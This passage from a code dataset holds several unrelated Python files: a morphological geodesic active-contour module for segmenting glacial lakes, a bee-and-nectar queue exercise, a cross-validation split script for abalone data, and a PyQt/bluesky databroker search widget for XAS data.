y)\n if sfixed:\n dx[0] = 0\n dy[0] = 0\n if efixed:\n dx[-1] = 0\n dy[-1] = 0\n x += dx\n y += dy\n\n # Convergence criteria needs to compare to a number of previous\n # configurations since oscillations can occur.\n j = i % (convergence_order + 1)\n if j < convergence_order:\n xsave[j, :] = x\n ysave[j, :] = y\n else:\n dist = np.min(np.max(np.abs(xsave - x[None, :])\n + np.abs(ysave - y[None, :]), 1))\n if dist < convergence:\n break\n\n return np.stack([y, x], axis=1)\n\nclass _fcycle(object):\n\n def __init__(self, iterable):\n \"\"\"Call functions from the iterable each time it is called.\"\"\"\n self.funcs = cycle(iterable)\n\n def __call__(self, *args, **kwargs):\n f = next(self.funcs)\n return f(*args, **kwargs)\n\n\n# SI and IS operators for 2D and 3D.\n_P2 = [np.eye(3),\n np.array([[0, 1, 0]] * 3),\n np.flipud(np.eye(3)),\n np.rot90([[0, 1, 0]] * 3)]\n_P3 = [np.zeros((3, 3, 3)) for i in range(9)]\n\n_P3[0][:, :, 1] = 1\n_P3[1][:, 1, :] = 1\n_P3[2][1, :, :] = 1\n_P3[3][:, [0, 1, 2], [0, 1, 2]] = 1\n_P3[4][:, [0, 1, 2], [2, 1, 0]] = 1\n_P3[5][[0, 1, 2], :, [0, 1, 2]] = 1\n_P3[6][[0, 1, 2], :, [2, 1, 0]] = 1\n_P3[7][[0, 1, 2], [0, 1, 2], :] = 1\n_P3[8][[0, 1, 2], [2, 1, 0], :] = 1\n\n\ndef _init_level_set(init_level_set, image_shape):\n \"\"\"Auxiliary function for initializing level sets with a string.\n If `init_level_set` is not a string, it is returned as is.\n \"\"\"\n if isinstance(init_level_set, str):\n if init_level_set == 'circle':\n res = circle_level_set(image_shape)\n elif init_level_set == 'ellipsoid':\n res = ellipsoid_level_set(image_shape)\n else:\n raise ValueError(\"`init_level_set` not in \"\n \"['checkerboard', 'circle', 'ellipsoid']\")\n else:\n res = init_level_set\n return res\n\n\ndef sup_inf(u):\n \"\"\"SI operator.\"\"\"\n\n if np.ndim(u) == 2:\n P = _P2\n elif np.ndim(u) == 3:\n P = _P3\n else:\n raise ValueError(\"u has an invalid number of dimensions \"\n \"(should be 2 or 3)\")\n\n erosions = []\n for P_i in P:\n erosions.append(ndi.binary_erosion(u, P_i))\n\n return np.array(erosions, dtype=np.int8).max(0)\n\ndef inf_sup(u):\n \"\"\"IS operator.\"\"\"\n\n if np.ndim(u) == 2:\n P = _P2\n elif np.ndim(u) == 3:\n P = _P3\n else:\n raise ValueError(\"u has an invalid number of dimensions \"\n \"(should be 2 or 3)\")\n\n dilations = []\n for P_i in P:\n dilations.append(ndi.binary_dilation(u, P_i))\n\n return np.array(dilations, dtype=np.int8).min(0)\n\n_curvop = _fcycle([lambda u: sup_inf(inf_sup(u)), # SIoIS\n lambda u: inf_sup(sup_inf(u))]) # ISoSI\n\ndef circle_level_set(image_shape, center=None, radius=None):\n \"\"\"Create a circle level set with binary values.\n Parameters\n ----------\n image_shape : tuple of positive integers\n Shape of the image\n center : tuple of positive integers, optional\n Coordinates of the center of the circle given in (row, column). If not\n given, it defaults to the center of the image.\n radius : float, optional\n Radius of the circle. 
If not given, it is set to 75% of the\n        smallest image dimension.\n    Returns\n    -------\n    out : array with shape `image_shape`\n        Binary level set of the circle with the given `radius` and `center`.\n    See also\n    --------\n    ellipsoid_level_set\n    checkerboard_level_set\n    \"\"\"\n\n    if center is None:\n        center = tuple(i // 2 for i in image_shape)\n\n    if radius is None:\n        radius = min(image_shape) * 3.0 / 8.0\n\n    grid = np.mgrid[[slice(i) for i in image_shape]]\n    grid = (grid.T - center).T\n    phi = radius - np.sqrt(np.sum((grid)**2, 0))\n    res = np.int8(phi > 0)\n    return res\n\n\ndef level_set_from_polygon(shape, xy_polygon):\n    img = np.zeros(shape, 'uint8')\n    poly = xy_polygon\n    rr, cc = polygon([a_tuple[1] for a_tuple in poly], [a_tuple[0] for a_tuple in poly], img.shape)\n    img[rr,cc] = 1\n    return img\n\n\ndef level_set_from_multipolygon(shape, xy_polygons):\n    img = np.zeros(shape, 'uint8')\n    for poly in xy_polygons:\n        rr, cc = polygon([a_tuple[1] for a_tuple in poly], [a_tuple[0] for a_tuple in poly], img.shape)\n        img[rr,cc] = 1\n    return img\n\n\ndef ellipsoid_level_set(image_shape, center=None, semi_axis=None):\n    \"\"\"Create an ellipsoid level set with binary values.\n    Parameters\n    ----------\n    image_shape : tuple of positive integers\n        Shape of the image\n    center : tuple of integers, optional\n        Coordinates of the center of the ellipsoid.\n        If not given, it defaults to the center of the image.\n    semi_axis : tuple of floats, optional\n        Lengths of the semi-axes of the ellipsoid.\n        If not given, it defaults to half of the image dimensions.\n    Returns\n    -------\n    out : array with shape `image_shape`\n        Binary level set of the ellipsoid with the given `center`\n        and `semi_axis`.\n    See also\n    --------\n    circle_level_set\n    \"\"\"\n\n    if center is None:\n        center = tuple(i // 2 for i in image_shape)\n\n    if semi_axis is None:\n        semi_axis = tuple(i / 2 for i in image_shape)\n\n    if len(center) != len(image_shape):\n        raise ValueError(\"`center` and `image_shape` must have the same length.\")\n\n    if len(semi_axis) != len(image_shape):\n        raise ValueError(\"`semi_axis` and `image_shape` must have the same length.\")\n\n    if len(image_shape) == 2:\n        xc, yc = center\n        rx, ry = semi_axis\n        phi = 1 - np.fromfunction(\n            lambda x, y: ((x - xc) / rx) ** 2 +\n                         ((y - yc) / ry) ** 2,\n            image_shape, dtype=float)\n    elif len(image_shape) == 3:\n        xc, yc, zc = center\n        rx, ry, rz = semi_axis\n        phi = 1 - np.fromfunction(\n            lambda x, y, z: ((x - xc) / rx) ** 2 +\n                            ((y - yc) / ry) ** 2 +\n                            ((z - zc) / rz) ** 2,\n            image_shape, dtype=float)\n    else:\n        raise ValueError(\"`image_shape` must be a 2- or 3-tuple.\")\n\n    res = np.int8(phi > 0)\n    return res\n\n\ndef _check_input(image, init_level_set):\n    \"\"\"Check that shapes of `image` and `init_level_set` match.\"\"\"\n    if image.ndim not in [2, 3]:\n        raise ValueError(\"`image` must be a 2 or 3-dimensional array.\")\n\n    if len(image.shape) != len(init_level_set.shape):\n        raise ValueError(\"The dimensions of the initial level set do not \"\n                         \"match the dimensions of the image.\")\n\n\ndef inverse_gaussian_gradient(x, alpha=100.0, sigma=5.0):\n    \"\"\"Inverse of gradient magnitude.\n    Compute the Gaussian gradient magnitude of the image and then invert the\n    result into the range [0, 1]. 
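In symbols, the returned image is\n    g = 1 / sqrt(1 + alpha * |grad(G_sigma * x)|), exactly as computed in the\n    function body below. 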
Flat areas are assigned values close to 1,\n    while areas close to borders are assigned values close to 0.\n    \"\"\"\n    gradnorm = ndi.gaussian_gradient_magnitude(x, sigma, mode='nearest')\n    return 1.0 / np.sqrt(1.0 + alpha * gradnorm)\n\n\ndef morphological_geodesic_active_contour(gimage, iterations,\n                                          init_level_set='circle', smoothing=1,\n                                          threshold='auto', balloon=0,\n                                          iter_callback=lambda x: None):\n    \"\"\"Morphological Geodesic Active Contours (MorphGAC).\n    Geodesic active contours implemented with morphological operators. It can\n    be used to segment objects with visible but noisy, cluttered, broken\n    borders.\n    Parameters\n    ----------\n    gimage : (M, N) or (B, M, N) array\n        Preprocessed image or volume to be segmented. This is very rarely the\n        original image. Instead, this is usually a preprocessed version of the\n        original image that enhances and highlights the borders (or other\n        structures) of the object to segment.\n        `morphological_geodesic_active_contour` will try to stop the contour\n        evolution in areas where `gimage` is small. See\n        `morphsnakes.inverse_gaussian_gradient` as an example function to\n        perform this preprocessing. Note that the quality of\n        `morphological_geodesic_active_contour` might greatly depend on this\n        preprocessing.\n    iterations : uint\n        Number of iterations to run.\n    init_level_set : str, (M, N) array, or (B, M, N) array\n        Initial level set. If an array is given, it will be binarized and used\n        as the initial level set. If a string is given, it defines the method\n        to generate a reasonable initial level set with the shape of the\n        `image`. Accepted values are 'circle' and 'ellipsoid'. See the\n        documentation of `circle_level_set` and `ellipsoid_level_set`\n        respectively for details about how these level sets are created.\n    smoothing : uint, optional\n        Number of times the smoothing operator is applied per iteration.\n        Reasonable values are around 1-4. Larger values lead to smoother\n        segmentations.\n    threshold : float, optional\n        Areas of the image with a value smaller than this threshold will be\n        considered borders. The evolution of the contour will stop in these\n        areas.\n    balloon : float, optional\n        Balloon force to guide the contour in non-informative areas of the\n        image, i.e., areas where the gradient of the image is too small to push\n        the contour towards a border. A negative value will shrink the contour,\n        while a positive value will expand the contour in these areas. Setting\n        this to zero will disable the balloon force.\n    iter_callback : function, optional\n        If given, this function is called once per iteration with the current\n        level set as the only argument. This is useful for debugging or for\n        plotting intermediate results during the evolution.\n    Returns\n    -------\n    out : (M, N) or (B, M, N) array\n        Final segmentation (i.e., the final level set)\n    See also\n    --------\n    inverse_gaussian_gradient, circle_level_set\n    Notes\n    -----\n    This is a version of the Geodesic Active Contours (GAC) algorithm that uses\n    morphological operators instead of solving partial differential equations\n    (PDEs) for the evolution of the contour. The set of morphological operators\n    used in this algorithm are proved to be infinitesimally equivalent to the\n    GAC PDEs (see [1]_). 
However, morphological operators do not suffer\n    from the numerical stability issues typically found in PDEs (e.g., it is\n    not necessary to find the right time step for the evolution), and are\n    computationally faster.\n    The algorithm and its theoretical derivation are described in [1]_.\n    References\n    ----------\n    .. [1] A Morphological Approach to Curvature-based Evolution of Curves and\n           Surfaces, Pablo Márquez-Neila, Luis Baumela, Luis Álvarez. In IEEE\n           Transactions on Pattern Analysis and Machine Intelligence (PAMI),\n           2014, DOI 10.1109/TPAMI.2013.106\n    \"\"\"\n\n    image = gimage\n    init_level_set = _init_level_set(init_level_set, image.shape)\n\n    _check_input(image, init_level_set)\n\n    if threshold == 'auto':\n        threshold = np.percentile(image, 50)\n\n    structure = np.ones((3,) * len(image.shape), dtype=np.int8)\n    dimage = np.gradient(image)\n    # threshold_mask = image > threshold\n    if balloon != 0:\n        threshold_mask_balloon = image > threshold / np.abs(balloon)\n\n    u = np.int8(init_level_set > 0)\n\n    iter_callback(u)\n\n    for _ in range(iterations):\n\n        # Balloon\n        if balloon > 0:\n            aux = ndi.binary_dilation(u, structure)\n        elif balloon < 0:\n            aux = ndi.binary_erosion(u, structure)\n        if balloon != 0:\n            u[threshold_mask_balloon] = aux[threshold_mask_balloon]\n\n        # Image attachment\n        aux = np.zeros_like(image)\n        du = np.gradient(u)\n        for el1, el2 in zip(dimage, du):\n            aux += el1 * el2\n        u[aux > 0] = 1\n        u[aux < 0] = 0\n\n        # Smoothing\n        for _ in range(smoothing):\n            u = _curvop(u)\n\n        iter_callback(u)\n\n    return u\n\n\ndef rgb2gray(img):\n    \"\"\"Convert an RGB image to gray scale.\"\"\"\n    return 0.2989 * img[..., 0] + 0.587 * img[..., 1] + 0.114 * img[..., 2]\n\n\ndef store_evolution_in(lst):\n    \"\"\"Returns a callback function to store the evolution of the level sets in\n    the given list.\n    \"\"\"\n\n    def _store(x):\n        lst.append(np.copy(x))\n\n    return _store\n\n\ndef snake_lakes_GAC(x, ls_center_point, iterations=300, ls_radious=10, igs_alpha=100, igs_sigma=2):\n    # Load the image.\n    imgcolor = x/256.\n    img = rgb2gray(imgcolor)\n\n    gimg = inverse_gaussian_gradient(img, alpha=igs_alpha, sigma=igs_sigma)\n\n    
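# note: gimg is ~1 in flat regions and ~0 along strong edges, so the GAC\n    # evolution below slows to a stop at lake borders\n    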
# Initialization of the level-set with a circle. ls_center_point should be\n    # the coordinate tuple (x, y) at the center of the known polygon;\n    # ls_radious is the radius of the circle level set\n    init_ls = circle_level_set(img.shape, ls_center_point, ls_radious)\n\n    # Callback for visual plotting\n    evolution = []\n    callback = store_evolution_in(evolution)\n\n    # Morphological GAC\n    return morphological_geodesic_active_contour(gimg, iterations=iterations,\n                                                 init_level_set=init_ls,\n                                                 smoothing=2, threshold='auto',\n                                                 balloon=1, iter_callback=callback\n                                                 ).astype(np.uint8), evolution\n\n\ndef snake_lakes_GAC_from_polygon(x, polygon, iterations=300, igs_alpha=100, igs_sigma=2.25):\n    # Load the image.\n    imgcolor = x/256.\n    img = rgb2gray(imgcolor)\n\n    gimg = inverse_gaussian_gradient(img, alpha=igs_alpha, sigma=igs_sigma)\n    \n    # Initialization of the level-set.\n    init_ls = level_set_from_polygon(img.shape, polygon)\n\n    # Callback for visual plotting\n    evolution = []\n    callback = store_evolution_in(evolution)\n    # Morphological GAC\n    return morphological_geodesic_active_contour(gimg, iterations=iterations,\n                                                 init_level_set=init_ls,\n                                                 smoothing=2, threshold='auto',\n                                                 balloon=1, iter_callback=callback\n                                                 ).astype(np.uint8), evolution\n\n\ndef snake_lakes_GAC_from_multipolygon(x, multipolygon, iterations=300, igs_alpha=100, igs_sigma=2.25):\n    # Load the image.\n    imgcolor = x/256.\n    img = rgb2gray(imgcolor)\n\n    gimg = inverse_gaussian_gradient(img, alpha=igs_alpha, sigma=igs_sigma)\n    \n    # Initialization of the level-set.\n    init_ls = level_set_from_multipolygon(img.shape, multipolygon)\n\n    # Callback for visual plotting\n    evolution = []\n    callback = store_evolution_in(evolution)\n    # Morphological GAC\n    return morphological_geodesic_active_contour(gimg, iterations=iterations,\n                                                 init_level_set=init_ls,\n                                                 smoothing=2, threshold='auto',\n                                                 balloon=1, iter_callback=callback\n                                                 ).astype(np.uint8), evolution\n","repo_name":"anthonymlortiz/icimod.glacial-lakes-baselines","sub_path":"models/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":21758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"628548471","text":"from collections import deque\n\nworking_bees = deque([int(i) for i in input().split()])\nnectars = [int(i) for i in input().split()]\nsymbols = deque(input().split())\nhoney = 0\noperation = {\n    \"+\": lambda x, y: x + y,\n    \"-\": lambda x, y: abs(x - y),\n    \"*\": lambda x, y: x * y,\n    \"/\": lambda x, y: x / y,\n}\n\nwhile working_bees and nectars:\n    bee = working_bees.popleft()\n    nectar = nectars.pop()\n\n    if nectar >= bee:\n        if nectar != 0:\n            symbol = symbols.popleft()\n            honey += operation[symbol](bee, nectar)\n    else:\n        working_bees.appendleft(bee)\n\nprint(f'Total honey made: {honey}')\nif working_bees:\n    print(f\"Bees left: {', '.join(str(i) for i in working_bees)}\")\nif nectars:\n    print(f'Nectar left: {\", \".join(str(i) for i in nectars)}')\n\n\n\n\n","repo_name":"PavelElenov/Python_Advanced","sub_path":"Stacks, Queues, Tuples and Sets - Exercise/honey.py","file_name":"honey.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"877919628","text":"import random\n\nwith open('abalone.train') as f:\n    lines = f.readlines()\n\nrandom.shuffle(lines)\nlines = lines[:-3]\ntotal = len(lines)\nchunk = total // 10\n\nfor i in range(10):\n    lines_copy = lines.copy()\n    val_lines = lines_copy[chunk * i: chunk * (i + 1)]\n    del lines_copy[chunk * i: chunk * (i + 1)]\n    train_lines = lines_copy\n    
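# each fold holds out the i-th ~10% chunk for validation and trains on the rest\n    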
assert len(train_lines) + len(val_lines) == total\n\n with open(f'abalone.train.{i}', 'w') as f:\n f.writelines(train_lines)\n\n with open(f'abalone.val.{i}', 'w') as f:\n f.writelines(val_lines)\n","repo_name":"endvroy/fml_hw2","sub_path":"random_split.py","file_name":"random_split.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14131936807","text":"import os\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport pkg_resources\n\nfrom PyQt5 import QtWidgets, QtCore, uic\nfrom PyQt5.QtCore import QSettings, QThread\nfrom PyQt5.QtWidgets import QMenu\nfrom PyQt5.Qt import Qt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas, \\\n NavigationToolbar2QT as NavigationToolbar\n\nfrom xas.xasproject import XASDataSet\n\nfrom qtpy.QtWidgets import (\n QApplication,\n QPushButton,\n QVBoxLayout,\n QLabel,\n QMainWindow,\n QWidget,\n)\nfrom bluesky_widgets.models.search import Search\nfrom bluesky_widgets.qt.search import QtSearch\nfrom bluesky_live.event import Event\n\n\nfrom sys import platform\nimport datetime\nimport os\nimport time\nfrom pathlib import Path\nimport pandas as pd\n\n\nfrom isstools.dialogs.BasicDialogs import message_box\n\n\n\n\nif platform == 'darwin':\n ui_path = pkg_resources.resource_filename('xview', 'ui/ui_xview_databroker.ui')\nelse:\n ui_path = pkg_resources.resource_filename('xview', 'ui/ui_xview_databroker.ui')\n\n\nclass UIXviewDatabroker(*uic.loadUiType(ui_path)):\n def __init__(self, db=None, parent=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setupUi(self)\n\n self.db = db\n self.range = 30\n self.parent = parent\n self.uid_list = []\n self.mode = 'Search'\n self.counter=0\n #self.tableWidget_data.selectionChanged.connect(self.show_start_doc)\n self.push_show_latest.clicked.connect(self.show_latest)\n self.push_show_later.clicked.connect(self.show_later)\n self.push_show_earlier.clicked.connect(self.show_earlier)\n self.push_goto_folder.clicked.connect(self.goto_folder)\n\n self.push_search.clicked.connect(self.search_db)\n\n self.tableWidget_data.setColumnCount(3)\n self.tableWidget_data.setHorizontalHeaderLabels(['Date', 'UID', 'Filename'])\n #self.tableWidget_data.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\n self.tableWidget_data.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)\n self.tableWidget_data.selectionModel().selectionChanged.connect(self.show_start_doc)\n\n\n def show_latest(self):\n self.counter = 0\n self.show_record_list()\n\n def show_record_list(self):\n self.list_uids.clear()\n self.uids = []\n self.entries = []\n\n print(f'Counter {self.counter}')\n for indx in range(self.range):\n record = -(indx+1)-self.range * self.counter\n document = self.db[record]\n uid = document.start['uid']\n timestamp = datetime.datetime.fromtimestamp(document.start['time'])\n try:\n filename = os.path.basename(document.start['interp_filename'])\n except:\n filename = 'tuning scan'\n time = timestamp.strftime('%m/%d/%y %H:%M:%S')\n entry = f'{time}...{uid[0:6]}...{filename}'\n self.entries.append(entry)\n self.uids.append(uid)\n\n self.list_uids.addItems(self.entries)\n\n\n def search_db(self):\n self.parent.statusBar().showMessage('Search in progress...')\n self.uid_list = list(self.db.v2.search({'element': self.lineEdit_element.text()}))\n self.parent.statusBar().showMessage('Search complete')\n self.get_records()\n\n def get_records(self):\n timestamps = []\n 
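# gather display metadata (timestamp, uid, filename) for the current page of up to 100 uids\n        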
filenames = []\n self.parent.statusBar().showMessage('Getting records...')\n uids =self.uid_list[self.counter*100:((self.counter+1)*100)]\n print(uids[0:3])\n for uid in uids:\n document = self.db[uid]\n timestamps.append(datetime.datetime.fromtimestamp(document.start['time']))\n try:\n filenames.append(document.start['interp_filename'])\n except:\n filenames.append('empty')\n self.parent.statusBar().showMessage('Records received')\n\n self.record = pd.DataFrame(list(zip(timestamps, uids, filenames)),columns = ['Timestamp','Uid','Filename'])\n\n self.populate_table()\n\n def populate_table(self):\n for jj in range(self.tableWidget_data.rowCount()):\n self.tableWidget_data.removeRow(0)\n\n ptable_row_index = 0\n for jj in range(len(self.record)):\n self.tableWidget_data.insertRow(ptable_row_index)\n self.tableWidget_data.setItem(ptable_row_index, 0,\n QtWidgets.QTableWidgetItem(\n str(self.record['Timestamp'][jj]).split('.')[0]))\n self.tableWidget_data.setItem(ptable_row_index, 1,\n QtWidgets.QTableWidgetItem(\n self.record['Uid'][jj][:6]))\n self.tableWidget_data.setItem(ptable_row_index, 2,\n QtWidgets.QTableWidgetItem(\n os.path.basename(self.record['Filename'][jj])))\n\n ptable_row_index += 1\n\n for jj in range(3):\n self.tableWidget_data.resizeColumnToContents(jj)\n\n def show_later(self):\n print(f'Counter {self.counter}')\n self.counter += 1\n try:\n self.get_records()\n except:\n message_box('Message','End of record reached')\n\n def show_earlier(self):\n print(f'Counter {self.counter}')\n if self.counter > 0:\n self.counter -= 1\n self.get_records()\n else:\n message_box('Message','Start of record reached')\n\n def show_start_doc(self):\n if self.tableWidget_data.selectedIndexes():\n indx = self.tableWidget_data.selectedIndexes()[0].row()\n uid = self.uid_list[indx+100*self.counter]\n start_doc = self.db[uid].start\n self.textEdit_start_doc.setText(str(start_doc))\n\n\n def goto_folder(self):\n if self.tableWidget_data.selectedIndexes():\n indx = self.tableWidget_data.selectedIndexes()[0].row()\n uid = self.uid_list[indx+100*self.counter]\n document = self.db[uid]\n folder = os.path.dirname(document.start['interp_filename'])\n print(folder)\n self.parent.widget_data.working_folder = folder\n self.parent.widget_data.set_working_folder()\n self.parent.tabWidget.setCurrentWidget(self.parent.tabWidget.widget(0))\n filename = os.path.basename(document.start['interp_filename']).split('.')[0]\n print(f'Filename {filename}')\n self.parent.widget_data.set_selection(filename)\n\n\n\n#######\n\nclass SearchAndOpen(Search):\n \"\"\"\n Extend Search model with a signal for when a result is \"opened\".\n\n In your application, you might have multiple such signals associated with\n different buttons.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.events.add(open=Event)\n\n @property\n def selected_runs(self):\n # This property would be useful in general and should be added to the\n # Search itself in bluesky-widgets.\n return [self.results[uid] for uid in self.selected_uids]\n\nclass QtSearchListWithButton(QWidget):\n \"\"\"\n A view for SearchAndOpen.\n\n Combines the QtSearches widget with a button.\n \"\"\"\n\n def __init__(self, model: SearchAndOpen, parent, add_open_button=True, add_to_proj_button=False, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.model = model\n self.db = self.model.current_catalog\n self.parent = parent\n self.layout = QVBoxLayout()\n self.setLayout(self.layout)\n self.layout.addWidget(QtSearch(model))\n\n if 
add_open_button:\n self.add_open_button()\n\n if add_to_proj_button:\n self.add_to_proj_button()\n\n\n def add_open_button(self):\n # Add a button that does something with the currently-selected Runs\n # when you click it.\n self._open_button = QPushButton(\"Open\")\n self.layout.addWidget(self._open_button)\n\n # Register a callback (slot) for the button qt click signal.\n self._open_button.clicked.connect(self._on_click_open_button)\n\n\n def _on_click_open_button(self):\n \"\"\"\n Receive the Qt signal and emit a bluesky-widgets one.\n\n Include a list of BlueskyRuns corresponding to the current selection.\n \"\"\"\n # self.model.events.open(selected_runs=self.model.selected_runs)\n run_list = self.model.selected_runs\n\n\n if len(run_list) == 1:\n try:\n run_start = run_list[0].metadata['start']\n folder = os.path.dirname(run_start['interp_filename'])\n print(folder)\n self.parent.widget_data.working_folder = folder\n self.parent.widget_data.set_working_folder()\n self.parent.tabWidget.setCurrentWidget(self.parent.tabWidget.widget(0))\n filename = os.path.basename(run_start['interp_filename']).split('.')[0]\n print(f'Filename {filename}')\n self.parent.widget_data.set_selection(filename)\n except KeyError:\n print('This DB entry is not an experiment')\n else:\n print('Multiple scan selection is not supported yet')\n\n def add_to_proj_button(self):\n self._proj_button = QPushButton(\"Add to XAS project\")\n self.layout.addWidget(self._proj_button)\n\n # Register a callback (slot) for the button qt click signal.\n self._proj_button.clicked.connect(self._on_click_proj_button)\n\n\n def _on_click_proj_button(self):\n # self.model.events.open(selected_runs=self.model.selected_runs)\n run_list = self.model.selected_runs\n\n x_list, data_list, label_list = [], [], []\n for run in run_list:\n uid = run.metadata['start']['uid']\n energy, mu, name = self.db.read_spectrum(uid)\n ds = XASDataSet(name=(f'{name} [db_proc]'), md={}, energy=energy, mu=mu, filename='',\n datatype='experiment')\n self.parent.project.append(ds)\n # x_list.append(x)\n # data_list.append(data)\n # label_list.append(label)\n\n # self.parent.widget_mcr.add_references_to_specific_set(x_list, data_list, label_list)\n\n\n\n\nheadings = (\n \"Unique ID\",\n \"Transient Scan ID\",\n \"Plan Name\",\n \"Sample Name\",\n \"Sample Comment\",\n \"Scanning\",\n \"Start Time\",\n \"Duration\",\n \"Exit Status\",\n)\n\ndef extract_results_row_from_run(run):\n \"\"\"\n Given a BlueskyRun, format a row for the table of search results.\n \"\"\"\n from datetime import datetime\n\n metadata = run.describe()[\"metadata\"]\n start = metadata[\"start\"]\n stop = metadata[\"stop\"]\n start_time = datetime.fromtimestamp(start[\"time\"])\n if stop is None:\n str_duration = \"-\"\n else:\n duration = datetime.fromtimestamp(stop[\"time\"]) - start_time\n str_duration = str(duration)\n str_duration = str_duration[: str_duration.index(\".\")]\n return (\n start[\"uid\"][:8],\n start.get(\"scan_id\", \"-\"),\n start.get(\"plan_name\", \"-\"),\n start.get(\"name\", \"-\"),\n start.get(\"comment\", \"-\"),\n str(start.get(\"motors\", \"-\")),\n start_time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n str_duration,\n \"-\" if stop is None else stop[\"exit_status\"],\n )\n\ncolumns = (headings, extract_results_row_from_run)\n\n\nheadings_proc = (\n \"Unique ID\",\n \"Sample name\",\n \"Compound\",\n \"Element\",\n \"Edge\",\n \"E0\",\n \"Start Time\",\n)\n\ndef extract_results_row_from_run_proc(run):\n \"\"\"\n Given a BlueskyRun, format a row for the table of search 
results.\n \"\"\"\n from datetime import datetime\n\n metadata = run.describe()[\"metadata\"]\n start = metadata[\"start\"]\n # stop = metadata[\"stop\"]\n start_time = datetime.fromtimestamp(start[\"time\"])\n # if stop is None:\n # str_duration = \"-\"\n # else:\n # duration = datetime.fromtimestamp(stop[\"time\"]) - start_time\n # str_duration = str(duration)\n # str_duration = str_duration[: str_duration.index(\".\")]\n\n return (\n start[\"uid\"][:8],\n start.get(\"Sample_name\", \"-\"),\n start.get(\"compound\", \"-\"),\n start.get(\"Element\", \"-\"),\n start.get(\"Edge\", \"-\"),\n start.get(\"E0\", \"-\"),\n start_time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n )\n\ncolumns_proc = (headings_proc, extract_results_row_from_run_proc)\n\ncolumns_dict = {'columns' : columns,\n 'columns_proc' : columns_proc}\n\n# CATALOG_NAME = \"iss\"\n# CATALOG_NAME = \"iss-local\"\n# import databroker\n#\n# catalog = databroker.catalog[CATALOG_NAME]\n\n# search_model = SearchAndOpen(catalog, columns=columns)\n\ndef get_SearchAndOpen_widget(parent, catalog=None, columns='columns', add_open_button=True, add_mcr_button=False):\n search_model = SearchAndOpen(catalog, columns=columns_dict[columns])\n # search_model.events.open.connect(\n # lambda event: print(f\"Opening {event.selected_runs}\")\n # )\n search_view = QtSearchListWithButton(search_model, parent, add_open_button=add_open_button, add_to_proj_button=add_mcr_button)\n return search_view\n\n\n\n # self.push_refresh_folder.clicked.connect(self.get_file_list)\n # self.push_plot_data.clicked.connect(self.plot_xas_data)\n # self.comboBox_sort_files_by.addItems(['Time','Name'])\n # self.comboBox_sort_files_by.currentIndexChanged.connect((self.get_file_list))\n #\n # self.comboBox_data_numerator.currentIndexChanged.connect(self.update_current_numerator)\n # self.comboBox_data_denominator.currentIndexChanged.connect(self.update_current_denominator)\n #\n # self.list_data.itemSelectionChanged.connect(self.select_files_to_plot)\n # self.push_add_to_project.clicked.connect(self.add_data_to_project)\n # self.list_data.setContextMenuPolicy(Qt.CustomContextMenu)\n # self.list_data.customContextMenuRequested.connect(self.xas_data_context_menu)\n #\n # self.list_data.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n # self.addCanvas()\n # self.keys = []\n # self.last_keys = []\n # self.current_plot_in = ''\n # self.binned_data = []\n # self.last_numerator= ''\n # self.last_denominator = ''\n # # Persistent settings\n # self.settings = QSettings('ISS Beamline', 'Xview')\n # self.working_folder = self.settings.value('working_folder', defaultValue='/GPFS/xf08id/User Data', type=str)\n #\n # if self.working_folder != '/GPFS/xf08id/User Data':\n # self.label_working_folder.setText(self.working_folder)\n # self.label_working_folder.setToolTip(self.working_folder)\n # self.get_file_list()\n #\n # def xas_data_context_menu(self,QPos):\n # menu = QMenu()\n # plot_action = menu.addAction(\"&Plot\")\n # add_to_project_action = menu.addAction(\"&Add to project\")\n # parentPosition = self.list_data.mapToGlobal(QtCore.QPoint(0, 0))\n # menu.move(parentPosition+QPos)\n # action = menu.exec_()\n # if action == plot_action:\n # self.plot_xas_data()\n # elif action == add_to_project_action:\n # self.add_data_to_project()\n #\n # def addCanvas(self):\n # self.figure_data = Figure()\n # #self.figure_data.set_facecolor(color='#E2E2E2')\n # self.figure_data.ax = self.figure_data.add_subplot(111)\n # self.canvas = FigureCanvas(self.figure_data)\n # self.toolbar = 
NavigationToolbar(self.canvas, self)\n # self.toolbar.resize(1, 10)\n # self.layout_plot_data.addWidget(self.toolbar)\n # self.layout_plot_data.addWidget(self.canvas)\n # self.figure_data.tight_layout()\n # self.canvas.draw()\n #\n # def select_working_folder(self):\n # self.working_folder = QtWidgets.QFileDialog.getExistingDirectory(self, \"Select a folder\", self.working_folder,\n # QtWidgets.QFileDialog.ShowDirsOnly)\n # if self.working_folder:\n # self.settings.setValue('working_folder', self.working_folder)\n # if len(self.working_folder) > 50:\n # self.label_working_folder.setText(self.working_folder[1:20] + '...' + self.working_folder[-30:])\n # else:\n # self.label_working_folder.setText(self.working_folder)\n # self.get_file_list()\n #\n # def get_file_list(self):\n # if self.working_folder:\n # self.list_data.clear()\n #\n # files_bin = [f for f in os.listdir(self.working_folder) if f.endswith('.dat')]\n #\n # if self.comboBox_sort_files_by.currentText() == 'Name':\n # files_bin.sort()\n # elif self.comboBox_sort_files_by.currentText() == 'Time':\n # files_bin.sort(key=lambda x: os.path.getmtime('{}/{}'.format(self.working_folder, x)))\n #\n # files_bin.reverse()\n # self.list_data.addItems(files_bin)\n #\n # def select_files_to_plot(self):\n # df, header = load_binned_df_from_file(f'{self.working_folder}/{self.list_data.currentItem().text()}')\n # keys = df.keys()\n # refined_keys = []\n # for key in keys:\n # if not (('timestamp' in key) or ('energy' in key)):\n # refined_keys.append(key)\n # self.keys = refined_keys\n # if self.keys != self.last_keys:\n # self.last_keys = self.keys\n # self.comboBox_data_numerator.clear()\n # self.comboBox_data_denominator.clear()\n # 